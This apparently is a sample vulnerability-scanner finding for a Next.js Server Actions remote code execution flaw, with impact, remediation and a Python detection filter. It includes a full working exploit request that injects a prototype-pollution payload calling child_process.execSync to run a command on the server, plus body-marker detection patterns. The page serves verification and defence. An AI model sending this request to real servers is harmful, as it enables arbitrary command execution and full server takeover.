This is example data. Real dashboards update continuously based on your assets.

Next.js Server Actions RCE (CVE-2025-29927) - www.example.com


Summary

A critical Remote Code Execution (RCE) vulnerability was detected on www.example.com affecting Next.js applications using Server Actions. This issue (CVE-2025-29927 and related) allows an unauthenticated attacker to exploit prototype pollution in the Server Actions request handling, leading to arbitrary code execution on the server via crafted multipart/form-data requests with Next-Action and X-Nextjs-* headers.

The detection was triggered by a request that injects a malicious _response._prefix payload invoking child_process.execSync, which would execute a command (e.g. powershell -c "40735*41081") and exfiltrate the result via a NEXT_REDIRECT digest. The command could be anything (e.g. reverse shell, data exfiltration, or cryptominer).

Security Impact

  • Full server compromise: Attacker can run arbitrary OS commands as the Node.js process user.
  • No authentication required: The vulnerable endpoint is typically the application root or any Server Action route.
  • Data theft, backdoors, ransomware: Commands can read env files, modify files, or deploy malware.
  • Affected versions: Next.js 15.x and 14.x with Server Actions enabled; fixed in patched releases.

How to Verify

Send the following raw HTTP request. A vulnerable server may respond with a redirect to /login?a=<command_output> or otherwise exhibit command execution.

POST / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Content-Length: 718
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Next-Action: x
X-Nextjs-Html-Request-Id: ZrKd3AZSNFsfOT7m5R8ZS
X-Nextjs-Request-Id: jbtwyidk
Accept-Encoding: gzip

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('powershell -c \"40735*41081\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

Expected on vulnerable host: Redirect (307) to a URL containing the output of the injected command (e.g. /login?a=1673503535 if the command was 40735*41081).

Expected on patched host: No command execution; normal or error response.

Remediation

  • Upgrade Next.js to the latest patched version that addresses Server Actions prototype pollution and RCE (check Next.js security advisories and CVE-2025-29927).
  • Disable or restrict Server Actions if upgrade is not immediately possible; restrict Next-Action requests at the edge/WAF level as a temporary mitigation.
  • Monitor for suspicious Next-Action and X-Nextjs-Request-Id requests and block known malicious payloads.
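The third remediation bullet asks for monitoring of Next-Action requests. As an added illustration (this is not code from the dashboard vendor or from Next.js), the following Python inspects a raw HTTP request the way an edge filter or log pipeline might: it treats any POST carrying a Next-Action header as a Server Action call and flags it when the multipart body contains the prototype-chain and module-loader markers that appear in the payload above (`__proto__`, `constructor:constructor`, `_response`/`_prefix`, `child_process`, `process.mainModule`). The sample requests are constructed for the example; the hex-action-id check reflects the assumption that legitimate Next.js action ids are hex digests, and the single-character id in the request above is treated as anomalous on that basis.

```python
import re
from typing import Dict, List, Tuple

# Body indicators taken from the finding above: a Server Action body should never
# reference the prototype chain, the constructor chain or the Node module loader.
SUSPICIOUS_BODY_MARKERS = (
    "__proto__",
    "constructor:constructor",
    '"_response"',
    '"_prefix"',
    "child_process",
    "process.mainModule",
)

# Assumption for this example: genuine Next.js action ids are hex digests.
ACTION_ID_RE = re.compile(r"^[0-9a-f]{16,}$")


def parse_raw_request(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (request line, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inspect_server_action_request(raw: str) -> dict:
    """Classify a request: is it a Server Action call, and does its body look like
    the prototype-pollution payload described in the finding?"""
    request_line, headers, body = parse_raw_request(raw)
    is_action = request_line.startswith("POST ") and "next-action" in headers
    action_id = headers.get("next-action", "")
    markers: List[str] = [m for m in SUSPICIOUS_BODY_MARKERS if m in body] if is_action else []
    bad_id = is_action and not ACTION_ID_RE.match(action_id)
    return {
        "server_action": is_action,
        "action_id": action_id,
        "multipart": headers.get("content-type", "").startswith("multipart/form-data"),
        "markers": markers,
        "anomalous_action_id": bad_id,
        # Block on payload markers; an odd action id alone is only an alert signal.
        "block": bool(markers),
    }


def _multipart_request(action_id: str, parts: List[str], boundary: str = "----X") -> str:
    """Build a constructed multipart Server Action request for the samples below."""
    body = ""
    for i, part in enumerate(parts):
        body += f"--{boundary}\r\nContent-Disposition: form-data; name=\"{i}\"\r\n\r\n{part}\r\n"
    body += f"--{boundary}--\r\n"
    headers = [
        "POST / HTTP/1.1",
        "Host: www.example.com",
        f"Content-Type: multipart/form-data; boundary={boundary}",
        f"Next-Action: {action_id}",
        f"Content-Length: {len(body)}",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


# Constructed samples (not captured traffic).
BENIGN_REQUEST = _multipart_request(
    "a3f1c9e2b7d4406e9f1a2b3c4d5e6f7081920304",
    ['["$K1"]', '{"email":"user@example.com"}'],
)
SUSPICIOUS_REQUEST = _multipart_request(
    "x",
    ['{"then":"$1:__proto__:then","_response":{"_prefix":"<placeholder>"}}', '"$@0"'],
)
PLAIN_POST = "POST /api/health HTTP/1.1\r\nHost: www.example.com\r\n\r\n{}"


if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("suspicious", SUSPICIOUS_REQUEST), ("plain", PLAIN_POST)):
        print(label, inspect_server_action_request(req))
```

In a real deployment the same checks would run on the decoded request at the WAF or in a request log processor; matching on body markers is a stop-gap until the upgrade in the first bullet is applied, since an attacker can vary the payload encoding.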

If you encountered an issue or false positive, contact [email protected].

ExposureIntel - Attack Surface Management Tools | External Asset Discovery & Exposure Monitoring